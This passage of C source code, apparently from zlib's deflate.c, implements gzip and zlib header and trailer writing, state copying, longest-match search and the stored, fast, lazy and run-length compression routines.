(s->status == INIT_STATE) { /* zlib header */ uInt header = (Z_DEFLATED + ((s->w_bits - 8) << 4)) << 8; uInt level_flags; if (s->strategy >= Z_HUFFMAN_ONLY || s->level < 2) level_flags = 0; else if (s->level < 6) level_flags = 1; else if (s->level == 6) level_flags = 2; else level_flags = 3; header |= (level_flags << 6); if (s->strstart != 0) header |= PRESET_DICT; header += 31 - (header % 31); putShortMSB(s, header); /* Save the adler32 of the preset dictionary: */ if (s->strstart != 0) { putShortMSB(s, (uInt)(strm->adler >> 16)); putShortMSB(s, (uInt)(strm->adler & 0xffff)); } strm->adler = adler32(0L, Z_NULL, 0); s->status = BUSY_STATE; /* Compression must start with an empty pending buffer */ flush_pending(strm); if (s->pending != 0) { s->last_flush = -1; return Z_OK; } } #ifdef GZIP if (s->status == GZIP_STATE) { /* gzip header */ strm->adler = crc32(0L, Z_NULL, 0); put_byte(s, 31); put_byte(s, 139); put_byte(s, 8); if (s->gzhead == Z_NULL) { put_byte(s, 0); put_byte(s, 0); put_byte(s, 0); put_byte(s, 0); put_byte(s, 0); put_byte(s, s->level == 9 ? 2 : (s->strategy >= Z_HUFFMAN_ONLY || s->level < 2 ? 4 : 0)); put_byte(s, OS_CODE); s->status = BUSY_STATE; /* Compression must start with an empty pending buffer */ flush_pending(strm); if (s->pending != 0) { s->last_flush = -1; return Z_OK; } } else { put_byte(s, (s->gzhead->text ? 1 : 0) + (s->gzhead->hcrc ? 2 : 0) + (s->gzhead->extra == Z_NULL ? 0 : 4) + (s->gzhead->name == Z_NULL ? 0 : 8) + (s->gzhead->comment == Z_NULL ? 0 : 16) ); put_byte(s, (Byte)(s->gzhead->time & 0xff)); put_byte(s, (Byte)((s->gzhead->time >> 8) & 0xff)); put_byte(s, (Byte)((s->gzhead->time >> 16) & 0xff)); put_byte(s, (Byte)((s->gzhead->time >> 24) & 0xff)); put_byte(s, s->level == 9 ? 2 : (s->strategy >= Z_HUFFMAN_ONLY || s->level < 2 ? 4 : 0)); put_byte(s, s->gzhead->os & 0xff); if (s->gzhead->extra != Z_NULL) { put_byte(s, s->gzhead->extra_len & 0xff); put_byte(s, (s->gzhead->extra_len >> 8) & 0xff); } if (s->gzhead->hcrc) strm->adler = crc32(strm->adler, s->pending_buf, s->pending); s->gzindex = 0; s->status = EXTRA_STATE; } } if (s->status == EXTRA_STATE) { if (s->gzhead->extra != Z_NULL) { ulg beg = s->pending; /* start of bytes to update crc */ uInt left = (s->gzhead->extra_len & 0xffff) - s->gzindex; while (s->pending + left > s->pending_buf_size) { uInt copy = s->pending_buf_size - s->pending; zmemcpy(s->pending_buf + s->pending, s->gzhead->extra + s->gzindex, copy); s->pending = s->pending_buf_size; HCRC_UPDATE(beg); s->gzindex += copy; flush_pending(strm); if (s->pending != 0) { s->last_flush = -1; return Z_OK; } beg = 0; left -= copy; } zmemcpy(s->pending_buf + s->pending, s->gzhead->extra + s->gzindex, left); s->pending += left; HCRC_UPDATE(beg); s->gzindex = 0; } s->status = NAME_STATE; } if (s->status == NAME_STATE) { if (s->gzhead->name != Z_NULL) { ulg beg = s->pending; /* start of bytes to update crc */ int val; do { if (s->pending == s->pending_buf_size) { HCRC_UPDATE(beg); flush_pending(strm); if (s->pending != 0) { s->last_flush = -1; return Z_OK; } beg = 0; } val = s->gzhead->name[s->gzindex++]; put_byte(s, val); } while (val != 0); HCRC_UPDATE(beg); s->gzindex = 0; } s->status = COMMENT_STATE; } if (s->status == COMMENT_STATE) { if (s->gzhead->comment != Z_NULL) { ulg beg = s->pending; /* start of bytes to update crc */ int val; do { if (s->pending == s->pending_buf_size) { HCRC_UPDATE(beg); flush_pending(strm); if (s->pending != 0) { s->last_flush = -1; return Z_OK; } beg = 0; } val = s->gzhead->comment[s->gzindex++]; put_byte(s, val); } while (val != 0); HCRC_UPDATE(beg); } s->status = HCRC_STATE; } if (s->status == HCRC_STATE) { if (s->gzhead->hcrc) { if (s->pending + 2 > s->pending_buf_size) { flush_pending(strm); if (s->pending != 0) { s->last_flush = -1; return Z_OK; } } put_byte(s, (Byte)(strm->adler & 0xff)); put_byte(s, (Byte)((strm->adler >> 8) & 0xff)); strm->adler = crc32(0L, Z_NULL, 0); } s->status = BUSY_STATE; /* Compression must start with an empty pending buffer */ flush_pending(strm); if (s->pending != 0) { s->last_flush = -1; return Z_OK; } } #endif /* Start a new block or continue the current one. */ if (strm->avail_in != 0 || s->lookahead != 0 || (flush != Z_NO_FLUSH && s->status != FINISH_STATE)) { block_state bstate; bstate = s->level == 0 ? deflate_stored(s, flush) : s->strategy == Z_HUFFMAN_ONLY ? deflate_huff(s, flush) : s->strategy == Z_RLE ? deflate_rle(s, flush) : (*(configuration_table[s->level].func))(s, flush); if (bstate == finish_started || bstate == finish_done) { s->status = FINISH_STATE; } if (bstate == need_more || bstate == finish_started) { if (strm->avail_out == 0) { s->last_flush = -1; /* avoid BUF_ERROR next call, see above */ } return Z_OK; /* If flush != Z_NO_FLUSH && avail_out == 0, the next call * of deflate should use the same flush parameter to make sure * that the flush is complete. So we don't have to output an * empty block here, this will be done at next call. This also * ensures that for a very small output buffer, we emit at most * one empty block. */ } if (bstate == block_done) { if (flush == Z_PARTIAL_FLUSH) { _tr_align(s); } else if (flush != Z_BLOCK) { /* FULL_FLUSH or SYNC_FLUSH */ _tr_stored_block(s, (char*)0, 0L, 0); /* For a full flush, this empty block will be recognized * as a special marker by inflate_sync(). */ if (flush == Z_FULL_FLUSH) { CLEAR_HASH(s); /* forget history */ if (s->lookahead == 0) { s->strstart = 0; s->block_start = 0L; s->insert = 0; } } } flush_pending(strm); if (strm->avail_out == 0) { s->last_flush = -1; /* avoid BUF_ERROR at next call, see above */ return Z_OK; } } } if (flush != Z_FINISH) return Z_OK; if (s->wrap <= 0) return Z_STREAM_END; /* Write the trailer */ #ifdef GZIP if (s->wrap == 2) { put_byte(s, (Byte)(strm->adler & 0xff)); put_byte(s, (Byte)((strm->adler >> 8) & 0xff)); put_byte(s, (Byte)((strm->adler >> 16) & 0xff)); put_byte(s, (Byte)((strm->adler >> 24) & 0xff)); put_byte(s, (Byte)(strm->total_in & 0xff)); put_byte(s, (Byte)((strm->total_in >> 8) & 0xff)); put_byte(s, (Byte)((strm->total_in >> 16) & 0xff)); put_byte(s, (Byte)((strm->total_in >> 24) & 0xff)); } else #endif { putShortMSB(s, (uInt)(strm->adler >> 16)); putShortMSB(s, (uInt)(strm->adler & 0xffff)); } flush_pending(strm); /* If avail_out is zero, the application will call deflate again * to flush the rest. */ if (s->wrap > 0) s->wrap = -s->wrap; /* write the trailer only once! */ return s->pending != 0 ? Z_OK : Z_STREAM_END; } /* ========================================================================= */ int ZEXPORT deflateEnd(z_streamp strm) { int status; if (deflateStateCheck(strm)) return Z_STREAM_ERROR; status = strm->state->status; /* Deallocate in reverse order of allocations: */ TRY_FREE(strm, strm->state->pending_buf); TRY_FREE(strm, strm->state->head); TRY_FREE(strm, strm->state->prev); TRY_FREE(strm, strm->state->window); ZFREE(strm, strm->state); strm->state = Z_NULL; return status == BUSY_STATE ? Z_DATA_ERROR : Z_OK; } /* ========================================================================= * Copy the source state to the destination state. * To simplify the source, this is not supported for 16-bit MSDOS (which * doesn't have enough memory anyway to duplicate compression states). */ int ZEXPORT deflateCopy(z_streamp dest, z_streamp source) { #ifdef MAXSEG_64K (void)dest; (void)source; return Z_STREAM_ERROR; #else deflate_state *ds; deflate_state *ss; if (deflateStateCheck(source) || dest == Z_NULL) { return Z_STREAM_ERROR; } ss = source->state; zmemcpy((voidpf)dest, (voidpf)source, sizeof(z_stream)); ds = (deflate_state *) ZALLOC(dest, 1, sizeof(deflate_state)); if (ds == Z_NULL) return Z_MEM_ERROR; dest->state = (struct internal_state FAR *) ds; zmemcpy((voidpf)ds, (voidpf)ss, sizeof(deflate_state)); ds->strm = dest; ds->window = (Bytef *) ZALLOC(dest, ds->w_size, 2*sizeof(Byte)); ds->prev = (Posf *) ZALLOC(dest, ds->w_size, sizeof(Pos)); ds->head = (Posf *) ZALLOC(dest, ds->hash_size, sizeof(Pos)); ds->pending_buf = (uchf *) ZALLOC(dest, ds->lit_bufsize, 4); if (ds->window == Z_NULL || ds->prev == Z_NULL || ds->head == Z_NULL || ds->pending_buf == Z_NULL) { deflateEnd (dest); return Z_MEM_ERROR; } /* following zmemcpy do not work for 16-bit MSDOS */ zmemcpy(ds->window, ss->window, ds->w_size * 2 * sizeof(Byte)); zmemcpy((voidpf)ds->prev, (voidpf)ss->prev, ds->w_size * sizeof(Pos)); zmemcpy((voidpf)ds->head, (voidpf)ss->head, ds->hash_size * sizeof(Pos)); zmemcpy(ds->pending_buf, ss->pending_buf, (uInt)ds->pending_buf_size); ds->pending_out = ds->pending_buf + (ss->pending_out - ss->pending_buf); ds->sym_buf = ds->pending_buf + ds->lit_bufsize; ds->l_desc.dyn_tree = ds->dyn_ltree; ds->d_desc.dyn_tree = ds->dyn_dtree; ds->bl_desc.dyn_tree = ds->bl_tree; return Z_OK; #endif /* MAXSEG_64K */ } #ifndef FASTEST /* =========================================================================== * Set match_start to the longest match starting at the given string and * return its length. Matches shorter or equal to prev_length are discarded, * in which case the result is equal to prev_length and match_start is * garbage. * IN assertions: cur_match is the head of the hash chain for the current * string (strstart) and its distance is <= MAX_DIST, and prev_length >= 1 * OUT assertion: the match length is not greater than s->lookahead. */ local uInt longest_match(deflate_state *s, IPos cur_match) { unsigned chain_length = s->max_chain_length;/* max hash chain length */ register Bytef *scan = s->window + s->strstart; /* current string */ register Bytef *match; /* matched string */ register int len; /* length of current match */ int best_len = (int)s->prev_length; /* best match length so far */ int nice_match = s->nice_match; /* stop if match long enough */ IPos limit = s->strstart > (IPos)MAX_DIST(s) ? s->strstart - (IPos)MAX_DIST(s) : NIL; /* Stop when cur_match becomes <= limit. To simplify the code, * we prevent matches with the string of window index 0. */ Posf *prev = s->prev; uInt wmask = s->w_mask; #ifdef UNALIGNED_OK /* Compare two bytes at a time. Note: this is not always beneficial. * Try with and without -DUNALIGNED_OK to check. */ register Bytef *strend = s->window + s->strstart + MAX_MATCH - 1; register ush scan_start = *(ushf*)scan; register ush scan_end = *(ushf*)(scan + best_len - 1); #else register Bytef *strend = s->window + s->strstart + MAX_MATCH; register Byte scan_end1 = scan[best_len - 1]; register Byte scan_end = scan[best_len]; #endif /* The code is optimized for HASH_BITS >= 8 and MAX_MATCH-2 multiple of 16. * It is easy to get rid of this optimization if necessary. */ Assert(s->hash_bits >= 8 && MAX_MATCH == 258, "Code too clever"); /* Do not waste too much time if we already have a good match: */ if (s->prev_length >= s->good_match) { chain_length >>= 2; } /* Do not look for matches beyond the end of the input. This is necessary * to make deflate deterministic. */ if ((uInt)nice_match > s->lookahead) nice_match = (int)s->lookahead; Assert((ulg)s->strstart <= s->window_size - MIN_LOOKAHEAD, "need lookahead"); do { Assert(cur_match < s->strstart, "no future"); match = s->window + cur_match; /* Skip to next match if the match length cannot increase * or if the match length is less than 2. Note that the checks below * for insufficient lookahead only occur occasionally for performance * reasons. Therefore uninitialized memory will be accessed, and * conditional jumps will be made that depend on those values. * However the length of the match is limited to the lookahead, so * the output of deflate is not affected by the uninitialized values. */ #if (defined(UNALIGNED_OK) && MAX_MATCH == 258) /* This code assumes sizeof(unsigned short) == 2. Do not use * UNALIGNED_OK if your compiler uses a different size. */ if (*(ushf*)(match + best_len - 1) != scan_end || *(ushf*)match != scan_start) continue; /* It is not necessary to compare scan[2] and match[2] since they are * always equal when the other bytes match, given that the hash keys * are equal and that HASH_BITS >= 8. Compare 2 bytes at a time at * strstart + 3, + 5, up to strstart + 257. We check for insufficient * lookahead only every 4th comparison; the 128th check will be made * at strstart + 257. If MAX_MATCH-2 is not a multiple of 8, it is * necessary to put more guard bytes at the end of the window, or * to check more often for insufficient lookahead. */ Assert(scan[2] == match[2], "scan[2]?"); scan++, match++; do { } while (*(ushf*)(scan += 2) == *(ushf*)(match += 2) && *(ushf*)(scan += 2) == *(ushf*)(match += 2) && *(ushf*)(scan += 2) == *(ushf*)(match += 2) && *(ushf*)(scan += 2) == *(ushf*)(match += 2) && scan < strend); /* The funny "do {}" generates better code on most compilers */ /* Here, scan <= window + strstart + 257 */ Assert(scan <= s->window + (unsigned)(s->window_size - 1), "wild scan"); if (*scan == *match) scan++; len = (MAX_MATCH - 1) - (int)(strend - scan); scan = strend - (MAX_MATCH-1); #else /* UNALIGNED_OK */ if (match[best_len] != scan_end || match[best_len - 1] != scan_end1 || *match != *scan || *++match != scan[1]) continue; /* The check at best_len - 1 can be removed because it will be made * again later. (This heuristic is not always a win.) * It is not necessary to compare scan[2] and match[2] since they * are always equal when the other bytes match, given that * the hash keys are equal and that HASH_BITS >= 8. */ scan += 2, match++; Assert(*scan == *match, "match[2]?"); /* We check for insufficient lookahead only every 8th comparison; * the 256th check will be made at strstart + 258. */ do { } while (*++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && scan < strend); Assert(scan <= s->window + (unsigned)(s->window_size - 1), "wild scan"); len = MAX_MATCH - (int)(strend - scan); scan = strend - MAX_MATCH; #endif /* UNALIGNED_OK */ if (len > best_len) { s->match_start = cur_match; best_len = len; if (len >= nice_match) break; #ifdef UNALIGNED_OK scan_end = *(ushf*)(scan + best_len - 1); #else scan_end1 = scan[best_len - 1]; scan_end = scan[best_len]; #endif } } while ((cur_match = prev[cur_match & wmask]) > limit && --chain_length != 0); if ((uInt)best_len <= s->lookahead) return (uInt)best_len; return s->lookahead; } #else /* FASTEST */ /* --------------------------------------------------------------------------- * Optimized version for FASTEST only */ local uInt longest_match(deflate_state *s, IPos cur_match) { register Bytef *scan = s->window + s->strstart; /* current string */ register Bytef *match; /* matched string */ register int len; /* length of current match */ register Bytef *strend = s->window + s->strstart + MAX_MATCH; /* The code is optimized for HASH_BITS >= 8 and MAX_MATCH-2 multiple of 16. * It is easy to get rid of this optimization if necessary. */ Assert(s->hash_bits >= 8 && MAX_MATCH == 258, "Code too clever"); Assert((ulg)s->strstart <= s->window_size - MIN_LOOKAHEAD, "need lookahead"); Assert(cur_match < s->strstart, "no future"); match = s->window + cur_match; /* Return failure if the match length is less than 2: */ if (match[0] != scan[0] || match[1] != scan[1]) return MIN_MATCH-1; /* The check at best_len - 1 can be removed because it will be made * again later. (This heuristic is not always a win.) * It is not necessary to compare scan[2] and match[2] since they * are always equal when the other bytes match, given that * the hash keys are equal and that HASH_BITS >= 8. */ scan += 2, match += 2; Assert(*scan == *match, "match[2]?"); /* We check for insufficient lookahead only every 8th comparison; * the 256th check will be made at strstart + 258. */ do { } while (*++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && *++scan == *++match && scan < strend); Assert(scan <= s->window + (unsigned)(s->window_size - 1), "wild scan"); len = MAX_MATCH - (int)(strend - scan); if (len < MIN_MATCH) return MIN_MATCH - 1; s->match_start = cur_match; return (uInt)len <= s->lookahead ? (uInt)len : s->lookahead; } #endif /* FASTEST */ #ifdef ZLIB_DEBUG #define EQUAL 0 /* result of memcmp for equal strings */ /* =========================================================================== * Check that the match at match_start is indeed a match. */ local void check_match(deflate_state *s, IPos start, IPos match, int length) { /* check that the match is indeed a match */ if (zmemcmp(s->window + match, s->window + start, length) != EQUAL) { fprintf(stderr, " start %u, match %u, length %d\n", start, match, length); do { fprintf(stderr, "%c%c", s->window[match++], s->window[start++]); } while (--length != 0); z_error("invalid match"); } if (z_verbose > 1) { fprintf(stderr,"\\[%d,%d]", start - match, length); do { putc(s->window[start++], stderr); } while (--length != 0); } } #else # define check_match(s, start, match, length) #endif /* ZLIB_DEBUG */ /* =========================================================================== * Flush the current block, with given end-of-file flag. * IN assertion: strstart is set to the end of the current match. */ #define FLUSH_BLOCK_ONLY(s, last) { \ _tr_flush_block(s, (s->block_start >= 0L ? \ (charf *)&s->window[(unsigned)s->block_start] : \ (charf *)Z_NULL), \ (ulg)((long)s->strstart - s->block_start), \ (last)); \ s->block_start = s->strstart; \ flush_pending(s->strm); \ Tracev((stderr,"[FLUSH]")); \ } /* Same but force premature exit if necessary. */ #define FLUSH_BLOCK(s, last) { \ FLUSH_BLOCK_ONLY(s, last); \ if (s->strm->avail_out == 0) return (last) ? finish_started : need_more; \ } /* Maximum stored block length in deflate format (not including header). */ #define MAX_STORED 65535 /* Minimum of a and b. */ #define MIN(a, b) ((a) > (b) ? (b) : (a)) /* =========================================================================== * Copy without compression as much as possible from the input stream, return * the current block state. * * In case deflateParams() is used to later switch to a non-zero compression * level, s->matches (otherwise unused when storing) keeps track of the number * of hash table slides to perform. If s->matches is 1, then one hash table * slide will be done when switching. If s->matches is 2, the maximum value * allowed here, then the hash table will be cleared, since two or more slides * is the same as a clear. * * deflate_stored() is written to minimize the number of times an input byte is * copied. It is most efficient with large input and output buffers, which * maximizes the opportunities to have a single copy from next_in to next_out. */ local block_state deflate_stored(deflate_state *s, int flush) { /* Smallest worthy block size when not flushing or finishing. By default * this is 32K. This can be as small as 507 bytes for memLevel == 1. For * large input and output buffers, the stored block size will be larger. */ unsigned min_block = MIN(s->pending_buf_size - 5, s->w_size); /* Copy as many min_block or larger stored blocks directly to next_out as * possible. If flushing, copy the remaining available input to next_out as * stored blocks, if there is enough space. */ unsigned len, left, have, last = 0; unsigned used = s->strm->avail_in; do { /* Set len to the maximum size block that we can copy directly with the * available input data and output space. Set left to how much of that * would be copied from what's left in the window. */ len = MAX_STORED; /* maximum deflate stored block length */ have = (s->bi_valid + 42) >> 3; /* number of header bytes */ if (s->strm->avail_out < have) /* need room for header */ break; /* maximum stored block length that will fit in avail_out: */ have = s->strm->avail_out - have; left = s->strstart - s->block_start; /* bytes left in window */ if (len > (ulg)left + s->strm->avail_in) len = left + s->strm->avail_in; /* limit len to the input */ if (len > have) len = have; /* limit len to the output */ /* If the stored block would be less than min_block in length, or if * unable to copy all of the available input when flushing, then try * copying to the window and the pending buffer instead. Also don't * write an empty block when flushing -- deflate() does that. */ if (len < min_block && ((len == 0 && flush != Z_FINISH) || flush == Z_NO_FLUSH || len != left + s->strm->avail_in)) break; /* Make a dummy stored block in pending to get the header bytes, * including any pending bits. This also updates the debugging counts. */ last = flush == Z_FINISH && len == left + s->strm->avail_in ? 1 : 0; _tr_stored_block(s, (char *)0, 0L, last); /* Replace the lengths in the dummy stored block with len. */ s->pending_buf[s->pending - 4] = len; s->pending_buf[s->pending - 3] = len >> 8; s->pending_buf[s->pending - 2] = ~len; s->pending_buf[s->pending - 1] = ~len >> 8; /* Write the stored block header bytes. */ flush_pending(s->strm); #ifdef ZLIB_DEBUG /* Update debugging counts for the data about to be copied. */ s->compressed_len += len << 3; s->bits_sent += len << 3; #endif /* Copy uncompressed bytes from the window to next_out. */ if (left) { if (left > len) left = len; zmemcpy(s->strm->next_out, s->window + s->block_start, left); s->strm->next_out += left; s->strm->avail_out -= left; s->strm->total_out += left; s->block_start += left; len -= left; } /* Copy uncompressed bytes directly from next_in to next_out, updating * the check value. */ if (len) { read_buf(s->strm, s->strm->next_out, len); s->strm->next_out += len; s->strm->avail_out -= len; s->strm->total_out += len; } } while (last == 0); /* Update the sliding window with the last s->w_size bytes of the copied * data, or append all of the copied data to the existing window if less * than s->w_size bytes were copied. Also update the number of bytes to * insert in the hash tables, in the event that deflateParams() switches to * a non-zero compression level. */ used -= s->strm->avail_in; /* number of input bytes directly copied */ if (used) { /* If any input was used, then no unused input remains in the window, * therefore s->block_start == s->strstart. */ if (used >= s->w_size) { /* supplant the previous history */ s->matches = 2; /* clear hash */ zmemcpy(s->window, s->strm->next_in - s->w_size, s->w_size); s->strstart = s->w_size; s->insert = s->strstart; } else { if (s->window_size - s->strstart <= used) { /* Slide the window down. */ s->strstart -= s->w_size; zmemcpy(s->window, s->window + s->w_size, s->strstart); if (s->matches < 2) s->matches++; /* add a pending slide_hash() */ if (s->insert > s->strstart) s->insert = s->strstart; } zmemcpy(s->window + s->strstart, s->strm->next_in - used, used); s->strstart += used; s->insert += MIN(used, s->w_size - s->insert); } s->block_start = s->strstart; } if (s->high_water < s->strstart) s->high_water = s->strstart; /* If the last block was written to next_out, then done. */ if (last) return finish_done; /* If flushing and all input has been consumed, then done. */ if (flush != Z_NO_FLUSH && flush != Z_FINISH && s->strm->avail_in == 0 && (long)s->strstart == s->block_start) return block_done; /* Fill the window with any remaining input. */ have = s->window_size - s->strstart; if (s->strm->avail_in > have && s->block_start >= (long)s->w_size) { /* Slide the window down. */ s->block_start -= s->w_size; s->strstart -= s->w_size; zmemcpy(s->window, s->window + s->w_size, s->strstart); if (s->matches < 2) s->matches++; /* add a pending slide_hash() */ have += s->w_size; /* more space now */ if (s->insert > s->strstart) s->insert = s->strstart; } if (have > s->strm->avail_in) have = s->strm->avail_in; if (have) { read_buf(s->strm, s->window + s->strstart, have); s->strstart += have; s->insert += MIN(have, s->w_size - s->insert); } if (s->high_water < s->strstart) s->high_water = s->strstart; /* There was not enough avail_out to write a complete worthy or flushed * stored block to next_out. Write a stored block to pending instead, if we * have enough input for a worthy block, or if flushing and there is enough * room for the remaining input as a stored block in the pending buffer. */ have = (s->bi_valid + 42) >> 3; /* number of header bytes */ /* maximum stored block length that will fit in pending: */ have = MIN(s->pending_buf_size - have, MAX_STORED); min_block = MIN(have, s->w_size); left = s->strstart - s->block_start; if (left >= min_block || ((left || flush == Z_FINISH) && flush != Z_NO_FLUSH && s->strm->avail_in == 0 && left <= have)) { len = MIN(left, have); last = flush == Z_FINISH && s->strm->avail_in == 0 && len == left ? 1 : 0; _tr_stored_block(s, (charf *)s->window + s->block_start, len, last); s->block_start += len; flush_pending(s->strm); } /* We've done all we can with the available input and output. */ return last ? finish_started : need_more; } /* =========================================================================== * Compress as much as possible from the input stream, return the current * block state. * This function does not perform lazy evaluation of matches and inserts * new strings in the dictionary only for unmatched strings or for short * matches. It is used only for the fast compression options. */ local block_state deflate_fast(deflate_state *s, int flush) { IPos hash_head; /* head of the hash chain */ int bflush; /* set if current block must be flushed */ for (;;) { /* Make sure that we always have enough lookahead, except * at the end of the input file. We need MAX_MATCH bytes * for the next match, plus MIN_MATCH bytes to insert the * string following the next match. */ if (s->lookahead < MIN_LOOKAHEAD) { fill_window(s); if (s->lookahead < MIN_LOOKAHEAD && flush == Z_NO_FLUSH) { return need_more; } if (s->lookahead == 0) break; /* flush the current block */ } /* Insert the string window[strstart .. strstart + 2] in the * dictionary, and set hash_head to the head of the hash chain: */ hash_head = NIL; if (s->lookahead >= MIN_MATCH) { INSERT_STRING(s, s->strstart, hash_head); } /* Find the longest match, discarding those <= prev_length. * At this point we have always match_length < MIN_MATCH */ if (hash_head != NIL && s->strstart - hash_head <= MAX_DIST(s)) { /* To simplify the code, we prevent matches with the string * of window index 0 (in particular we have to avoid a match * of the string with itself at the start of the input file). */ s->match_length = longest_match (s, hash_head); /* longest_match() sets match_start */ } if (s->match_length >= MIN_MATCH) { check_match(s, s->strstart, s->match_start, s->match_length); _tr_tally_dist(s, s->strstart - s->match_start, s->match_length - MIN_MATCH, bflush); s->lookahead -= s->match_length; /* Insert new strings in the hash table only if the match length * is not too large. This saves time but degrades compression. */ #ifndef FASTEST if (s->match_length <= s->max_insert_length && s->lookahead >= MIN_MATCH) { s->match_length--; /* string at strstart already in table */ do { s->strstart++; INSERT_STRING(s, s->strstart, hash_head); /* strstart never exceeds WSIZE-MAX_MATCH, so there are * always MIN_MATCH bytes ahead. */ } while (--s->match_length != 0); s->strstart++; } else #endif { s->strstart += s->match_length; s->match_length = 0; s->ins_h = s->window[s->strstart]; UPDATE_HASH(s, s->ins_h, s->window[s->strstart + 1]); #if MIN_MATCH != 3 Call UPDATE_HASH() MIN_MATCH-3 more times #endif /* If lookahead < MIN_MATCH, ins_h is garbage, but it does not * matter since it will be recomputed at next deflate call. */ } } else { /* No match, output a literal byte */ Tracevv((stderr,"%c", s->window[s->strstart])); _tr_tally_lit(s, s->window[s->strstart], bflush); s->lookahead--; s->strstart++; } if (bflush) FLUSH_BLOCK(s, 0); } s->insert = s->strstart < MIN_MATCH-1 ? s->strstart : MIN_MATCH-1; if (flush == Z_FINISH) { FLUSH_BLOCK(s, 1); return finish_done; } if (s->sym_next) FLUSH_BLOCK(s, 0); return block_done; } #ifndef FASTEST /* =========================================================================== * Same as above, but achieves better compression. We use a lazy * evaluation for matches: a match is finally adopted only if there is * no better match at the next window position. */ local block_state deflate_slow(deflate_state *s, int flush) { IPos hash_head; /* head of hash chain */ int bflush; /* set if current block must be flushed */ /* Process the input block. */ for (;;) { /* Make sure that we always have enough lookahead, except * at the end of the input file. We need MAX_MATCH bytes * for the next match, plus MIN_MATCH bytes to insert the * string following the next match. */ if (s->lookahead < MIN_LOOKAHEAD) { fill_window(s); if (s->lookahead < MIN_LOOKAHEAD && flush == Z_NO_FLUSH) { return need_more; } if (s->lookahead == 0) break; /* flush the current block */ } /* Insert the string window[strstart .. strstart + 2] in the * dictionary, and set hash_head to the head of the hash chain: */ hash_head = NIL; if (s->lookahead >= MIN_MATCH) { INSERT_STRING(s, s->strstart, hash_head); } /* Find the longest match, discarding those <= prev_length. */ s->prev_length = s->match_length, s->prev_match = s->match_start; s->match_length = MIN_MATCH-1; if (hash_head != NIL && s->prev_length < s->max_lazy_match && s->strstart - hash_head <= MAX_DIST(s)) { /* To simplify the code, we prevent matches with the string * of window index 0 (in particular we have to avoid a match * of the string with itself at the start of the input file). */ s->match_length = longest_match (s, hash_head); /* longest_match() sets match_start */ if (s->match_length <= 5 && (s->strategy == Z_FILTERED #if TOO_FAR <= 32767 || (s->match_length == MIN_MATCH && s->strstart - s->match_start > TOO_FAR) #endif )) { /* If prev_match is also MIN_MATCH, match_start is garbage * but we will ignore the current match anyway. */ s->match_length = MIN_MATCH-1; } } /* If there was a match at the previous step and the current * match is not better, output the previous match: */ if (s->prev_length >= MIN_MATCH && s->match_length <= s->prev_length) { uInt max_insert = s->strstart + s->lookahead - MIN_MATCH; /* Do not insert strings in hash table beyond this. */ check_match(s, s->strstart - 1, s->prev_match, s->prev_length); _tr_tally_dist(s, s->strstart - 1 - s->prev_match, s->prev_length - MIN_MATCH, bflush); /* Insert in hash table all strings up to the end of the match. * strstart - 1 and strstart are already inserted. If there is not * enough lookahead, the last two strings are not inserted in * the hash table. */ s->lookahead -= s->prev_length - 1; s->prev_length -= 2; do { if (++s->strstart <= max_insert) { INSERT_STRING(s, s->strstart, hash_head); } } while (--s->prev_length != 0); s->match_available = 0; s->match_length = MIN_MATCH-1; s->strstart++; if (bflush) FLUSH_BLOCK(s, 0); } else if (s->match_available) { /* If there was no match at the previous position, output a * single literal. If there was a match but the current match * is longer, truncate the previous match to a single literal. */ Tracevv((stderr,"%c", s->window[s->strstart - 1])); _tr_tally_lit(s, s->window[s->strstart - 1], bflush); if (bflush) { FLUSH_BLOCK_ONLY(s, 0); } s->strstart++; s->lookahead--; if (s->strm->avail_out == 0) return need_more; } else { /* There is no previous match to compare with, wait for * the next step to decide. */ s->match_available = 1; s->strstart++; s->lookahead--; } } Assert (flush != Z_NO_FLUSH, "no flush?"); if (s->match_available) { Tracevv((stderr,"%c", s->window[s->strstart - 1])); _tr_tally_lit(s, s->window[s->strstart - 1], bflush); s->match_available = 0; } s->insert = s->strstart < MIN_MATCH-1 ? s->strstart : MIN_MATCH-1; if (flush == Z_FINISH) { FLUSH_BLOCK(s, 1); return finish_done; } if (s->sym_next) FLUSH_BLOCK(s, 0); return block_done; } #endif /* FASTEST */ /* =========================================================================== * For Z_RLE, simply look for runs of bytes, generate matches only of distance * one. Do not maintain a hash table. (It will be regenerated if this run of * deflate switches away from Z_RLE.) */ local block_state deflate_rle(deflate_state *s, int flush) { int bflush; /* set if current block must be flushed */ uInt prev; /* byte at distance one to match */ Bytef *scan, *strend; /* scan goes up to strend for length of run */ for (;;) { /* Make sure that we always have enough lookahead, except * at the end of the input file. We need MAX_MATCH bytes * for the longest run, plus one for the unrolled loop. */ if (s->lookahead <= MAX_MATCH) { fill_window(s); if (s->lookahead <= MAX_MATCH && flush == Z_NO_FLUSH) { return need_more; } if (s->lookahead == 0) break; /* flush the current block */ } /* See how many times the previous byte repeats */ s->match_length = 0; if (s->lookahead >= MIN_MATCH && s->strstart > 0) { scan = s->window + s->strstart - 1; prev = *scan; if (prev == *++scan && prev == *++scan && prev == *++scan) { strend = s->window + s->strstart + MAX_MATCH; do { } while (prev == *++scan && prev == *++scan && prev == *++scan && prev == *++scan && prev == *++scan && prev == *++scan && prev == *++scan && prev == *++scan && scan < strend); s->match_length = MAX_MATCH - (uInt)(strend - scan); if (s->match_length > s->lookahead) s->match_length = s->lookahead; } Assert(scan <= s->window + (uInt)(s->window_size - 1), "wild scan"); } /* Emit match if have run of MIN_MATCH or longer, else emit literal */ if (s->match_length >= MIN_MATCH) { check_match(s, s->strstart, s->strstart - 1, s->match_length); _tr_tally_dist(s, 1, s->match_length - MIN_MATCH, bflush); s->lookahead -= s->match_length; s->strstart += s->match_length; s->match_length = 0; } else { /* No match, output a literal byte */ Tracevv((stderr,"%c", s->window[s->strstart])); _tr_tally_lit(s, s->window[s->strstart], bflush); s->lookahead--; s->strstart++; } if (bflush) FLUSH_BLOCK(s, 0); } s->insert = 0; if (flush == Z_FINISH) { FLUSH_BLOCK(s, 1); return finish_done; } if (s->sym_next) FLUSH_BLOCK(s, 0); return block_done; } /* =========================================================================== * For Z_HUFFMAN_ONLY, do not look for matches. Do not maintain a hash table. * (It will be regenerated if this run of deflate switches away from Huffman.) */ local block_state deflate_huff(deflate_state *s, int flush) { int bflush; /* set if current block must be flushed */ for (;;) { /* Make sure that we have a literal to write. */ if (s->lookahead == 0) { fill_window(s); if (s->lookahead == 0) { 